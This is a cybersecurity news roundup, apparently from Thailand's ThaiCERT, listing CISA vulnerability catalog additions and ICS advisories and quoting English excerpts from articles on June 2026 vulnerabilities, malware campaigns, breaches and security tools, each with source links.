NCSA_THAICERT

NCSA_THAICERT

Apple แก้ช่องโหว่ Beats Studio Buds หลังพบความเสี่ยงถูกด.png

สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand

NCSA_THAICERT

Xsolis เปิดเผยเหตุข้อมูลรั่วไหล กระทบบุคคลเกื.png

สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand

NCSA_THAICERT

สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand

NCSA_THAICERT

เมื่อวันที่ 23 มิถุนายน 2569 Cybersecurity and Infrastructure Security Agency (CISA) ได้เพิ่มช่องโหว่ใหม่ 4 รายการลงในแคตตาล็อก Known Exploited Vulnerabilities (KEV) จากหลักฐานที่พบว่ามีการโจมตีใช้งานจริงแล้ว มีรายละเอียดดังนี้

CVE-2025-67038 Lantronix EDS5000 Code Injection Vulnerability
CVE-2026-34908 Ubiquiti UniFi OS Improper Access Control Vulnerability
CVE-2026-34909 Ubiquiti UniFi OS Path Traversal Vulnerability
CVE-2026-34910 Ubiquiti UniFi OS Improper Input Validation Vulnerability

ทาง CISA จะปรับปรุงและเพิ่มช่องโหว่ใหม่เข้าสู่แคตตาล็อก KEV อย่างต่อเนื่อง เพื่อให้ครอบคลุมความเสี่ยงที่ตรวจพบจริงในปัจจุบันและอนาคต

อ้างอิง
https://www.cisa.gov/news-events/alerts/2026/06/23/cisa-adds-four-known-exploited-vulnerabilities-catalog

สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand

NCSA_THAICERT

Cybersecurity and Infrastructure Security Agency (CISA) ได้เผยแพร่คำแนะนำเกี่ยวกับระบบควบคุมอุตสาหกรรม (ICS) จำนวน 10 รายการ เมื่อวันที่ 23 มิถุนายน 2569 เพื่อให้ข้อมูลที่ทันเวลาเกี่ยวกับประเด็นด้านความมั่นคงปลอดภัย ช่องโหว่ และการโจมตีที่เกี่ยวข้องกับระบบ ICS โดยมีรายละเอียดดังนี้

ICSA-26-174-01 Siemens WinCC Certificate Manager
ICSA-26-174-02 Siemens SIPROTEC 5
ICSA-26-174-03 Siemens Products using OpenSSL
ICSA-26-174-04 Siemens SINEC INS
ICSA-26-174-05 ABB Freelance Security Lock
ICSA-26-174-06 Impact of Linux Kernel vulnerabilities on B&R products
ICSA-26-174-07 Hubbell Aclara Metrum Cellular Web Interface
ICSA-25-317-04 Brightpick Mission Control / Internal Logic Control (Update A)
ICSA-24-345-06 Rockwell Automation Arena (Update C)
ICSA-26-111-06 Zero Motorcycles Firmware (Update A)

อ้างอิง

https://www.cisa.gov/news-events/ics-advisories

NCSA_THAICERT

Vulnerabilities

Cisco Unified CM Flaw CVE-2026-20230 Now Exploited In Attacks
"A high-severity SSRF vulnerability, tracked as CVE-2026-20230, in Cisco Unified Communications Manager Server is now being exploited in attacks. Cisco released security updates for the CVE-2026-20230 flaw on June 3, warning that exploitation could give attackers root privileges on the device. "A vulnerability in Cisco Unified Communications Manager (Unified CM) and Cisco Unified Communications Manager Session Management Edition (Unified CM SME) could allow an unauthenticated, remote attacker to conduct server-side request forgery (SSRF) attacks through an affected device," warned Cisco."
https://www.bleepingcomputer.com/news/security/cisco-unified-cm-sme-flaw-cve-2026-20230-now-exploited-in-attacks/
Security Vulnerabilities Endanger Connections Via Libssh2
"The open-source SSH library libssh2 is vulnerable. Attackers can exploit two security vulnerabilities to attack systems. In the worst case, malicious code can compromise computers. According to currently available information, the patch status is unclear. At the time of this report, there are no reports of attackers already exploiting the vulnerabilities. Companies use the library in sensitive areas of the network, for example, to remotely control routers and IoT devices and to manage servers. Consequently, successful attacks could have far-reaching consequences."
https://www.heise.de/en/news/Security-vulnerabilities-endanger-connections-via-libssh2-11339594.html
Eight-Year-Old Samsung KNOX Flaw Exposed Millions Of Galaxy Devices To Kernel Attacks
"Researchers found an eight-year old high severity vulnerability affecting nearly all Samsung devices from the Galaxy S9 to S25 living within the KNOX kernel. The flaw (CVE‑2026‑20971, CVSS 7.8) could be exploited through the interaction between PROCA and FIVE. PROCA, the process authenticator, is a proprietary subsystem in the kernel of the Samsung devices designed to prevent unauthorized processes from executing. It validates process authenticity using FIVE, the kernel side integrity subsystem, based on the Linux integrity-measurement model and extended by Samsung."
https://www.securityweek.com/eight-year-old-samsung-knox-flaw-exposed-millions-of-galaxy-devices-to-kernel-attacks/
Vendor-Signed UEFI Applications Found Vulnerable To Secure Boot Bypass
"Multiple vendor-signed UEFI applications are vulnerable to Secure Boot bypass via a "Bring Your Own Vulnerable Driver" (BYOVD)-style attack. If a target system trusts the affected vendor’s certificate, an attacker can exploit these applications to execute arbitrary code during the early pre-boot phase before the operating system initializes. To mitigate this risk, system administrators should apply updates to the UEFI Forbidden Signature Database (DBX) that revoke trust in the affected vendor-signed binaries, preventing these vulnerable applications from executing during the boot process."
https://kb.cert.org/vuls/id/457458

Malware

“Free World Cup Stream” Sites Are Serving Scams, Not Football
"With the World Cup on, you’ll find no shortage of websites promising every match, live, in HD, for free. They look convincing, usually with a video player, a “Live Stream Available” indicator, a row of server buttons, maybe a match schedule, and a “Watch Live” button. There’s no signup, no paywall, and seemingly, no catch. But of course there’s a catch. These sites aren’t really in the business of streaming football. What the page is really built to do is fire pop-ups, hidden ads, and redirects through an advertising network we detect as malicious. Instead of watching the match, visitors end up facing scams, malware, and fraudulent downloads."
https://www.malwarebytes.com/blog/threat-intel/2026/06/free-world-cup-stream-sites-are-serving-scams-not-football
https://www.helpnetsecurity.com/2026/06/23/fake-world-cup-streaming-sites-scams/
Phishing Through Collaboration: Outlook Groups As An Attack Path And The Usage Of CalPhishing
"Fortra Intelligence and Research Experts (FIRE) is tracking phishing activity that abuses Outlook Groups and Microsoft 365 collaboration features to make malicious activity appear routine. The technique shifts malicious intent away from a single phishing email into a trusted productivity workflow. A user may see what looks like a normal group addition, internal update, shared resource, or calendar item before being pushed toward an action."
https://www.fortra.com/blog/phishing-through-collaboration
https://www.helpnetsecurity.com/2026/06/23/microsoft-365-collaboration-features-phishing/
From PostCSS Masquerading To Windows RAT
"The package name is not random. The legitimate postcss-selector-parser package is widely used across the JavaScript build ecosystem, with npm reporting more than 150M weekly downloads. postcss-minify-selector-parser is not a classic one-character typo. Instead, it sits close enough to the legitimate package to look plausible during a quick dependency review. It uses the same postcss, selector, parser, and css keyword space, and it also depends on the real postcss-selector-parser. At the time of this report, the package remained live and accessible."
https://research.jfrog.com/post/from-postcss-typosquat-to-windows-rat/
https://thehackernews.com/2026/06/malicious-npm-packages-pose-as-postcss.html
https://www.infosecurity-magazine.com/news/lookalike-npm-package-postcss/
GTA 6 Early Access Is Nothing But a Scam
"A new wave of scam websites is offering something millions of people want: a way to play Grand Theft Auto VI before it comes out. “Get GTA 6 before everyone else.” “Buy VIP early access.” Pay a few hundred dollars in cryptocurrency, enter a payment code, and supposedly unlock the game. But it’s a scam."
https://www.malwarebytes.com/blog/threat-intel/2026/06/gta-6-early-access-is-nothing-but-a-scam
https://www.infosecurity-magazine.com/news/gta-6-scams-emerge-as-preorders/
https://www.helpnetsecurity.com/2026/06/23/gta-6-early-access-scam/
From Langflow To Monero: Inside CVE-2026-33017 Cryptominer
"This cryptocurrency-mining campaign shows how exposed AI application endpoints are becoming another route into enterprise environments. The payload might be familiar, but the delivery vector is not. A Langflow vulnerability gives commodity cryptominer operators a new front door into systems running AI application infrastructure."
https://www.trendmicro.com/en_us/research/26/f/from-langflow-to-monero-inside-cve-2026-33017-cryptominer.html
Malware à La Mode: Tracking Dropping Elephant Tradecraft Through a China-Themed Loader Chain
"Rapid7 researchers have identified a sophisticated malware campaign attributed to the threat actor "Dropping Elephant," characterized by the use of a China-themed decoy document to deliver a heavily reworked, in-memory remote access trojan (RAT). This campaign demonstrates advanced evasion techniques, including DLL side-loading with a legitimate Microsoft binary (Fondue.exe) and the use of "Donut" shellcode to map the RAT directly into memory, effectively bypassing traditional disk-based security controls."
https://www.rapid7.com/blog/post/tr-malware-tracking-dropping-elephant-tradecraft-china-themed-loader-chain/
Cordyceps: The Silent Parasite Consuming Your Supply Chain
"Novee identified a systemic class of exploitable CI/CD vulnerabilities across the open-source supply chain – command injection, broken authentication logic, artifact poisoning chains, and privilege escalation in GitHub Actions workflows. Our team scanned roughly 30,000 high-impact repositories, validated hundreds of fully exploitable attack chains, and received confirmation of fixes at dozens of organizations, including Microsoft, Google, Apache, Cloudflare, and the Python Software Foundation. There are millions of repositories that are potentially affected by this same pattern."
https://novee.security/blog/cordyceps/
https://www.darkreading.com/application-security/cordyceps-malicious-pull-requests-developer-workflows
https://hackread.com/cordyceps-ci-cd-flaw-microsoft-google-apache-repos-hijack/
Inside The FortiBleed Open Directory: A Technical Analysis Of What The Attacker Left Behind
"CloudSEK’s threat intelligence team is tracking FortiBleed, an active, large-scale credential-compromise campaign targeting internet-facing Fortinet FortiGate firewalls and SSL VPN gateways worldwide. Despite the name, FortiBleed is not a software vulnerability and is not linked to any newly disclosed Fortinet flaw or zero-day. It is the label given to a verified dataset of working device credentials that a threat group assembled through credential reuse, brute force, and offline hash cracking against exposed devices."
https://www.cloudsek.com/blog/inside-the-fortibleed-open-directory-a-technical-analysis-of-what-the-attacker-left-behind
https://www.helpnetsecurity.com/2026/06/23/fortibleed-investigation-remediation/
Payouts King Ransomware Initial Access Broker Deploys New Edgecution Malware
"Zscaler ThreatLabz has been monitoring ransomware operations that align with tactics previously employed by an initial access broker affiliated with Payouts King ransomware. In recent attacks, the threat actor leverages social engineering tactics paired with an innovative malware delivery mechanism. The technique utilizes a malicious Microsoft Edge browser extension that exploits the Chrome native messaging protocol to interact with host-native applications beyond the confines of the browser sandbox. By abusing this interface, the attackers gain direct host access, enabling them to manipulate the local filesystem, launch processes, and execute arbitrary code on the compromised host. We have dubbed this web browser-based malware Edgecution."
https://www.zscaler.com/blogs/security-research/payouts-king-ransomware-initial-access-broker-deploys-new-edgecution

Breaches/Hacks/Leaks

Xsolis Data Breach Affects 1.4 Million Individuals
"Healthcare technology company Xsolis, Inc. has disclosed a data breach affecting nearly 1.4 million individuals. Tennessee-based Xsolis provides utilization management and revenue cycle solutions for hospitals, health systems, and payers. The company published a data security notice in early June, revealing that unauthorized activity was detected on its systems on January 22. The intrusion resulted from a targeted phishing attack carried out two days earlier."
https://www.securityweek.com/xsolis-data-breach-affects-1-4-million-individuals/
https://www.bleepingcomputer.com/news/security/healthtech-firm-xolis-suffers-data-breach-impacting-14-million-people/
https://securityaffairs.com/194067/cyber-crime/xsolis-data-breach-impacts-1-4-million-people.html
https://www.bankinfosecurity.com/xsolis-hack-affecting-14m-raises-ai-vendor-risk-concerns-a-32051
Tata Electronics Confirms Cyberattack As Hackers Leak Data
"Tata Electronics has confirmed in a statement to BleepingComputer that it was the target of a cyberattack that impacted parts of its IT infrastructure. The company emphasizes that its operations continued to run normally and were not affected by the incident. "A few weeks ago, Tata Electronics identified a cybersecurity incident on some of our systems,” a Tata Electronics spokesperson told BleepingComputer."
https://www.bleepingcomputer.com/news/security/tata-electronics-confirms-cyberattack-as-hackers-leak-data/
https://therecord.media/tata-electronics-confirms-cyberattack
LastPass Confirms Data Breach In Klue Supply Chain Attack
"LastPass announced that hackers accessed customer data from its Salesforce environment after stealing the company's OAuth tokens in the Klue supply chain attack earlier this month. The password management platform says its products, services, and infrastructure were not affected by the incident and that customer vaults remained secure. “On June 12th, LastPass was made aware of an incident that occurred at Klue (klue.com), a third-party market intelligence platform utilized by our go-to-market teams, which integrates with our Salesforce and Gong systems,” LastPass says."
https://www.bleepingcomputer.com/news/security/lastpass-confirms-data-breach-in-klue-supply-chain-attack/
https://blog.lastpass.com/posts/klue-supply-chain-incident-and-lastpass-response
https://www.darkreading.com/cyberattacks-data-breaches/scope-salesforce-attacks-expands-icarus-leaks-data
https://hackread.com/lastpass-customer-data-breach-klue-oauth-token/

General News

Nearly Half Of LG Smart TV Apps Are Laced With Proxies
"Everyone worries about the apps on their phone. Almost no one looks at the ones on their TV. We scanned 6,038 of them across LG and Samsung; 2,058 were selling your IP address. On screen, it's a relaxing fish tank. Or a clock. Or solitaire. Or puppies. Under the hood, it is a residential proxy: software that can send other people's internet traffic out through your living room. And we found it everywhere."
https://spur.us/blog/smart-tv-apps-residential-proxy-sdks
https://www.helpnetsecurity.com/2026/06/23/tv-residential-proxy-sdk/
Only 7% Of Companies Are Ready For The AI Agents They Deployed
"Most organizations now run or pilot AI agents that operate on company data with limited human direction at each step, a share that reaches 88% in Veeam Software’s Data and AI Trust Gap report. The systems that are supposed to keep an eye on them have not caught up. That gap is the heart of the report. Most executives say their data problems are already holding their AI back. The issues are familiar ones: data that is out of date, data that contradicts itself, and data locked away in systems that do not talk to each other. An agent acting on shaky data does more than make a single mistake. It can repeat that mistake across thousands of decisions before anyone notices."
https://www.helpnetsecurity.com/2026/06/23/ai-trust-gap-research/
Daybreak: Tools For Securing Every Organization In The World
"We’re expanding Daybreak⁠ to help democratize patching vulnerable software at machine speed. For example, we’ve applied our models to discover and generate patches for critical vulnerabilities⁠ in major browsers, network infrastructure, and operating systems such as FreeBSD and the Linux kernel. To scale the impact of these capabilities:"
https://openai.com/index/daybreak-securing-the-world/
https://thehackernews.com/2026/06/openai-expands-daybreak-with-gpt-55.html
https://www.infosecurity-magazine.com/news/openai-daybreak-gpt-5-5-cyber/
https://www.securityweek.com/openai-refocuses-cybersecurity-efforts-on-patching-over-discovery/
https://www.helpnetsecurity.com/2026/06/23/openai-expanded-daybreak-cybersecurity-initiative/
Scattered Spider Teens Convicted Of TfL Cyber-Attack
"Two British youngsters who hacked Transport for London (TfL) in 2024 have pleaded guilty to their crimes, according to the National Crime Agency (NCA). Thalha Jubair, 20, from East London, and Owen Flowers, 18, from Walsall, West Midlands, were teenagers when they hacked London’s transport authority between August 31 and September 3 2024. Both are said to be members of the infamous Scattered Spider collective. The incident cost TfL £29m ($38m) in loss and recovery costs, according to the NCA. It apparently impacted TfL’s customer refund system for some time, downed the application system for Oyster photocards for children and young people, and forced all 28,000 employees to attend a TfL office for a password reset."
https://www.infosecurity-magazine.com/news/scattered-spider-teens-convicted/
https://therecord.media/guilty-plea-tfl-cyberattack-scattered-spider-members
https://www.bleepingcomputer.com/news/security/scattered-spider-members-plead-guilty-to-hacking-transport-for-london/
https://hackread.com/scattered-spider-hackers-guilty-tfl-cyberattack/
https://www.bankinfosecurity.com/2-british-men-plead-guilty-to-transport-for-london-hacks-a-32048
Algerian Man Extradited To US For Running Cybercrime Marketplaces
"Abdellah Belmili, a 26-year-old Algerian national, was recently arrested in Spain and extradited to the United States, where he faces up to 30 years in prison for allegedly running two cybercrime marketplaces. According to the US Justice Department, Belmili, also known as Dila Belmili and Spox, was the administrator of a cybercrime marketplace called Market0Day between September and December 2020. Authorities said Spox was known for developing phishing kits targeting major American financial institutions."
https://www.securityweek.com/algerian-man-extradited-to-us-for-running-cybercrime-marketplaces/
https://cyberscoop.com/algerian-man-charged-cybercrime-marketplaces/
He Thought He Was Secure; His Phone Number Got Stolen Anyway
"Torsten George, chief cybersecurity evangelist at ID Dataweb, Inc., felt helpless as he sat with his personal cell phone up to one ear and realized he was in the throes of an active attack. The person on the other end claimed to be an AT&T customer service representative looking to give George a discount for being a loyal customer. But it didn't take long to recognize that the “representative” was a threat actor with inside information on George's account history, derived through social engineering."
https://www.darkreading.com/cyber-risk/how-a-sim-swap-attack-led-to-a-near-account-takeover
CISO Conversations: Carl Froggett – Combining CISO And CIO At Deep Instinct
"Carl Froggett combines CISO and CIO. He currently occupies both positions at Deep Instinct. Before then, he was CISO at Citi for almost 17 years. Froggett has long believed the two roles overlap, making a combined role attractive. But it doesn’t work for all companies. Citi has more than 200,000 employees. Deep Instinct has fewer than 200. Combining CISO and CIO would be too much for one person at Citi, but works well at Deep Instinct."
https://www.securityweek.com/ciso-conversations-carl-froggett-combining-ciso-and-cio-at-deep-instinct/
Justice Department Seizes Backend Infrastructure Used By The Huione Group For Money Laundering Services
"Today, the Justice Department announced the seizure of a cloud computing account used by subsidiaries of the Huione Group, a Cambodia-based corporate conglomerate. These subsidiaries are alleged to have assisted individuals and organizations in transferring proceeds of cryptocurrency investment frauds, cyber scams, and other criminal activities on cryptocurrency blockchains and allowing for the conversion of the proceeds of these schemes to the legitimate banking sector undetected.The seized account hosted backend infrastructure for the subsidiaries."
https://www.justice.gov/opa/pr/justice-department-seizes-backend-infrastructure-used-huione-group-money-laundering-services
https://home.treasury.gov/news/press-releases/sb0538
https://therecord.media/feds-seize-alleged-cyber-scam-infrastructure-southeast-asia
https://cyberscoop.com/doj-huione-group-cybercrime-seizure/
Using Reddit To Manipulate AI Search Results Is Surprisingly Easy
"A Reddit comment that takes only a few seconds to write can end up influencing the answers generated by AI research tools. A Cornell Tech study found that a short snippet of user-generated text, sometimes as little as 13 words, was enough to affect the output of deep-research agents, AI systems that search the web, gather information from multiple sources, and generate reports with citations. The risks of relying on community-generated content are already familiar to many internet users. Google’s AI Overviews famously recommended adding glue to pizza sauce after pulling information from an old joke Reddit post."
https://www.helpnetsecurity.com/2026/06/23/reddit-ai-search-poisoning-research/
https://arxiv.org/pdf/2605.24245
Inside The Dark Web: Stolen Identities For 95¢, Malware, And Scams-For-Hire
"Most people have heard of the dark web, but few understand what it actually looks like or what goes on there. To separate fact from fiction, our research team spent 48 hours exploring it firsthand and documenting what we found. The dark web isn’t inherently bad. It also serves legitimate purposes, providing a layer of privacy for journalists, whistleblowers, activists, and others who need to communicate anonymously. Accessing it typically requires the Tor browser, and a number of reputable organizations operate official dark web sites."
https://www.malwarebytes.com/blog/threat-intel/2026/06/inside-the-dark-web-stolen-identities-for-95¢-malware-and-scams-for-hire
Software-Defined Warfare: Crossing The Chasm In Two Software Areas
"Software-defined warfare is today’s reality for national security, shifting the emphasis in military operations from hardware to software, “the core of every weapon and supporting system” fielded for defense. The Atlantic Council’s 2025 Commission on Software-Defined Warfare: Final Report defines software-defined warfare as the “continuous integration and delivery of cutting-edge technology and leading interoperable software into legacy and future defense systems.” The report emphasizes the need for speed through artificial intelligence (AI) by calling on national security organizations to “acquire and sustain unified, shared platforms that support and accelerate the end-to-end development, deployment, and governance of AI solutions.”"
https://www.sei.cmu.edu/blog/software-defined-warfare-crossing-the-chasm-in-two-software-areas/
Fake AI Agent Skill Passed Security Scans And Reportedly Reached 26,000 Agents
"Security firm AIR built a fake AI agent skill, pushed it through a popular skill marketplace and an Instagram ad, and says it reached roughly 26,000 agents, including some on corporate accounts. Every skill security scanner the firm tested it against marked it safe. The payload was harmless by design: it collected the user's email address and did nothing else. The point was to show that none of the signals people lean on to trust a skill caught it: not the scanners, not the GitHub stars, not the open-source reputation."
https://thehackernews.com/2026/06/fake-ai-agent-skill-passed-security.html

อ้างอิง

Electronic Transactions Development Agency (ETDA)

NCSA_THAICERT

New Tooling

Agent Beacon: Open-Source Telemetry Layer For AI Agents
"AI coding agents such as Claude Code, Codex CLI, Cursor, and Claude Cowork run on developer laptops, CI jobs, cloud environments, where they edit files, run commands, and call outside tools. Beacon, an open-source project from Asymptote Labs, configures telemetry for those runtimes and writes a normalized record of what each agent does across local, CI, and cloud-agent surfaces."
https://www.helpnetsecurity.com/2026/06/22/agent-beacon-open-source-telemetry-layer-ai-agents/
https://github.com/Asymptote-Labs/agent-beacon/
Sniff Out Stale AI Override Advice With This Open Source CLI
"The JavaScript development ecosystem may be a security nightmare, but it's also ripe for improvement. One such tool is the CVE Lite CLI, a free open source dependency scanner that helps reduce the risk of software supply chain attacks. It runs locally and provides actionable vulnerability fixes, if any are available. The tool, endorsed by OWASP, has recently been updated to include override auditing, which has the potential to avert transitive dependency vulnerabilities such as the March 2022 node-ipc package incident."
https://www.theregister.com/security/2026/06/23/sniff-out-stale-ai-override-advice-with-this-open-source-cli/5259853
https://owasp.org/cve-lite-cli/

Vulnerabilities

PixelSmash – Critical FFmpeg Vulnerability Turns Media Files Into Weapons
"JFrog Security Research recently discovered and disclosed a critical vulnerability in FFmpeg, the world’s most widely deployed media processing framework. The discovered vulnerability, which we’ve named PixelSmash, is CVE-2026-8461 – a heap out-of-bounds write in the MagicYUV decoder (CVSS 8.8 High). We escalated this vulnerability from a simple crash all the way to reliable remote code execution – all it takes is processing a single malicious media file."
https://jfrog.com/blog/pixelsmash-critical-ffmpeg-vulnerability-turns-media-files-into-weapons/
https://www.bleepingcomputer.com/news/security/ffmpeg-fixes-pixelsmash-flaw-in-widely-used-video-decoder/
Squidbleed (CVE-2026-47729)
"Two weeks ago, we dropped an HTTP/2 bomb cooked up by Codex Cyber. This time, we sent Claude Mythos Preview spelunking through Squid’s guts, and it surfaced clutching a 29-year-old bug. Meet Squidbleed: a Heartbleed-style vulnerability that leaks internal memory from every version of Squid Proxy, in its default configuration."
https://blog.calif.io/p/squidbleed-cve-2026-47729
https://thehackernews.com/2026/06/29-year-old-squid-proxy-bug-squidbleed.html
https://www.securityweek.com/decades-old-squid-proxy-flaw-squidbleed-can-expose-user-data/
DifyTap: Zafran Discovers How Attackers Can Silently Wiretap AI Data Across Tenants On a Platform Powering 1M+ Apps
"Zafran Security uncovered four vulnerabilities in Dify, the open-source AI platform powering over one million applications and used by enterprises including Volvo, Maersk, Panasonic, and Thermo Fisher. Two were critical severity, two required no authentication, and three carried cross-tenant impact on Dify's multi-tenant cloud service, allowing one customer's data to be exposed to another."
https://www.zafran.io/resources/difytap-zafran-discovers-how-attackers-can-silently-wiretap-ai-data-across-tenants-on-a-platform-powering-1m-apps
https://thehackernews.com/2026/06/researchers-detail-difytap-flaws-in.html
The Global Namespace Risk: Universal Bucket Hijacking Technique For Cloud Data Exfiltration
"We recently identified a bucket hijacking technique impacting multiple services across major cloud service providers (CSPs). The attack technique exploits a fundamental architectural flaw that is common across cloud providers and could potentially affect other cloud providers as well. Our research reveals that an attacker can silently compromise an organization's active data streams by rerouting data into an external storage bucket. Because a storage bucket name is globally unique, an attacker can simply delete the bucket and then recreate it under the attacker's own account using the same name. This therefore creates a global namespace risk. This bucket hijacking reroutes critical logs and sensitive data directly to the attacker’s environment."
https://unit42.paloaltonetworks.com/cloud-bucket-hijacking-risks/

Malware

A VBScript Campaign Distributed Through WhatsApp Deploying RMM Software
"In June 2026, we observed a malware campaign distributing malicious VBScript files through direct messages in WhatsApp. The campaign affected users across multiple countries and territories, including Malaysia, Brazil, India, Mexico, Singapore, UK, Spain, Taiwan, Australia, Russia and Vietnam, with the highest number of victims observed in Malaysia. At the time of writing this article, the campaign is still active."
https://securelist.com/whatsapp-vbs-rmm-campaign/120290/
https://www.bleepingcomputer.com/news/security/whatsapp-phishing-attack-uses-fake-business-docs-to-hack-pcs/
https://securityaffairs.com/194031/malware/whatsapp-malware-campaign-hijacks-trust-installs-legitimate-admin-tools.html
Dismantling FortiBleed: Inside a Russian Fortinet Compromise Operation
"Dismantling FortiBleed investigates an active credential-harvesting operation identified by the SOCRadar Threat Research Unit (STRU). The report traces the campaign from large-scale reconnaissance and credential sourcing through initial access, passive sniffer deployment, offline hash cracking, and targeted exfiltration. STRU assesses the operator to be an Initial Access Broker (IAB) motivated by financial gain, with tooling comments in the Cyrillic alphabet pointing to a likely Russian origin. The investigation began with a single exposed directory flagged by researcher Volodymyr “Bob” Diachenko and expanded into more than 260 operation servers."
https://socradar.io/resources/whitepapers/dismantling-fortibleed-inside-a-russian-fortinet-compromise-operation/
https://www.bleepingcomputer.com/news/security/fortibleed-campaign-used-custom-fortigate-sniffer-to-steal-credentials/
https://securityaffairs.com/194004/hacking/fortibleed-the-most-detailed-breakdown-yet-of-an-active-russian-credential-harvesting-operation.html
More Than 4,000 Legacy Routers Compromised By AryStinger, Turned Into Global Attack Proxies For Hackers
"On May 20, 2026, the Ministry of State Security's WeChat official account published an article "Your internet is slow, and the culprit turns out to be this!", highlighting that outdated routers are becoming a key entry point for threat actors to conduct cyber espionage. Inspired by this article, we feel it is imperative to take the compromise of old routers seriously. This article introduces an unusual attack campaign observed within QiAnXin XLab's field of view, specifically targeting router devices based on the RTL819X series chips. The mainstream active period of the RTL819X series chips was concentrated around 2012 to 2015. The attackers exploited vulnerabilities disclosed 13 years ago to compromise a large number of old routers, building reconnaissance and attack clusters for use in the pre-intrusion footprinting stage. (Note: The campaign disclosed in this article has no direct relationship to what the Ministry of State Security described.)"
https://blog.xlab.qianxin.com/arystinger-botnet-hijacks-legacy-routers-for-global-attacks-en/
https://thehackernews.com/2026/06/arystinger-malware-infects-4300-legacy.html
https://www.bleepingcomputer.com/news/security/arystinger-botnet-infected-thousands-of-d-link-routers-worldwide/
https://www.bankinfosecurity.com/arystinger-botnet-converts-legacy-routers-to-global-proxies-a-32045
https://www.malwarebytes.com/blog/news/2026/06/thousands-of-d-link-routers-under-control-of-arystinger-botnet
https://securityaffairs.com/193987/security/4300-outdated-routers-hijacked-in-stealthy-spy-infrastructure-by-arystinger-malware.html
Prinz Eugen Ransomware: a Deep Dive Into a New Go-Based Encryptor
"On May 11, 2026, our research team investigated a customer infected with a brand-new ransomware family called Prinz Eugen. The encryptor is freshly built, written in Go, and more technically deliberate than many first-wave ransomware samples. It performs recursive encryption, prioritizes recently modified files, uses ChaCha20-Poly1305 with integrity checks, and leaves no ransom note on disk. The first public report related to this family is dated April 16, when a public social media post noted that a new ransomware leak portal had appeared to extort Standard Bank Group, a leading financial institution in South Africa."
https://www.threatdown.com/blog/prinz-eugen-ransomware-a-deep-dive-into-a-new-go-based-encryptor/
https://www.bleepingcomputer.com/news/security/new-prinz-eugen-ransomware-prioritizes-recent-files-for-encryption/
From Package To Postinstall Payload: Inside The Mastra Npm Supply Chain Compromise By Sapphire Sleet
"Microsoft assesses with high confidence that this activity is attributable to Sapphire Sleet, a North Korean state actor that primarily targets the financial sector. The infrastructure and post-compromise TTPs observed in this campaign are consistent with previously documented Sapphire Sleet activity. Sapphire Sleet also conducted a separate npm supply chain compromise affecting Axios, a popular JavaScript HTTP client, in April 2026."
https://www.microsoft.com/en-us/security/blog/2026/06/17/postinstall-payload-inside-mastra-npm-supply-chain-compromise/
https://www.bleepingcomputer.com/news/security/microsoft-links-mastra-ai-supply-chain-attack-to-north-korean-hackers/
https://www.infosecurity-magazine.com/news/mastra-ai-supply-chain-attack/
https://www.securityweek.com/north-korean-hackers-blamed-for-mastra-npm-supply-chain-attack/
Threat Hunting Beyond Alerts: Finding The Activity Detection Misses
"Threat hunting is meant to uncover malicious activity before it becomes an incident. In reality, it can easily turn into a long expedition through noisy logs, vague indicators, and detection rules that lack the context needed to separate real risk from routine activity. The issue is rarely the analyst’s skill. The real bottleneck is intelligence quality. A standalone IP address, domain, or hash may be useful for blocking, but it does not explain the campaign behind it, the behaviors it leaves on endpoints, or the infrastructure likely to appear next."
https://hackread.com/threat-hunting-alerts-finding-activity-detection-misses/
Lost In Relocation: Analysis Of a New Loader Distributing CASTLESTEALER
"A previously undocumented Windows loader tracked as OXLOADER is delivering the CASTLESTEALER infostealer via malicious Google Ads, with low detection rates across static engines and sandbox detonations. The loader uses several obfuscation layers (control-flow flattening, opaque predicates, mixed Boolean-Arithmetic), self-modifying decryption stubs, and abuses the Windows .reloc section to stage shellcode. Elastic Security Labs identified OXLOADER in an active campaign targeting one of our customers; CIS-region and Russian-language exclusions point to a financially motivated, Russian-speaking threat actor. We have found no prior public reporting on this family."
https://www.elastic.co/security-labs/oxloader-malware-loader-infostealer
https://thehackernews.com/2026/06/new-oxloader-loader-uses-malicious.html
Gizmodo Readers Hit With ClickFix Malware Prompts After Account Compromise
"Veteran tech website Gizmodo confirmed a compromise on Saturday after readers reported ClickFix malware prompts appearing on article pages. Users posted screenshots of fake CAPTCHA windows appearing on Gizmodo's site. The attack aims to fool users into running malicious code via their terminals. According to Proofpoint threat researcher Tommy M, the attack was seemingly launched by an affiliate of ErrTraffic, a ClickFix-as-a-service program that allows attackers to deliver whichever malware they choose."
https://www.theregister.com/security/2026/06/22/gizmodo-readers-hit-with-clickfix-malware-prompts-after-account-compromise/5259226
Analyzing SHEET#CREEP: SHEETCREEP Is Up Again With Different Config Obfuscation
"The Securonix Threat Research team has identified an ongoing espionage campaign, tracked as SHEETCREEP, where threat actors deliver a C# remote access trojan through a diplomatic-themed ISO phishing lure. Building upon the initial discovery and excellent research of the SHEETCREEP malware family by Zscaler’s ThreatLabz, we observed that the RAT abuses the Google Sheets API as its command-and-control (C2) channelauthenticating via an embedded GCP service account private key and using individual spreadsheet tabs per victim for bidirectional communication. Our team successfully extracted the embedded credentials, authenticated to the live C2 spreadsheet, and identified 91 active victim tabs including a high-confidence target located in Pakistan."
https://www.securonix.com/blog/sheetcreep-evolved-google-sheets-rat
Ababil Of Minab Exposed: LA Metro SCADA Backups And Israeli Victim Data Left Open On An Iranian Staging Server
"Ababil of Minab is a pro-Iranian threat actor that surfaced in late March 2026, claiming destructive intrusions against targets in the United States, Israel, Saudi Arabia, and Turkey, including a confirmed breach of the Los Angeles County Metropolitan Transportation Authority. On May 26, 2026, Gambit Security published a technical report documenting SQL Server deletion, VM partition wipes, Veeam backup destruction, and file system damage across four victim environments, but deliberately withheld the identities of additional targets."
https://hunt.io/blog/ababil-of-minab-iranian-hackers-exposed-la-metro-breach-open-directory

Breaches/Hacks/Leaks

JaredFromSubway MEV Bot Hacked In $15 Million Crypto Theft
"The JaredFromSubway Ethereum MEV (Maximal Extractable Value) bot suffered a $15 million loss after an attacker manipulated the opportunity-detection logic by creating fake cryptocurrency trading opportunities. The drain was detected on Saturday by blockchain security firm Blockaid, and today, JaredFromSubway confirmed that the attacker used fake pools and tokens to trick the bot into approving helper contracts. According to Blockaid, the attacker deployed contracts designed to appear as profitable MEV opportunities to JaredFromSubway's automated execution system."
https://www.bleepingcomputer.com/news/security/jaredfromsubway-mev-bot-hacked-in-15-million-crypto-theft/
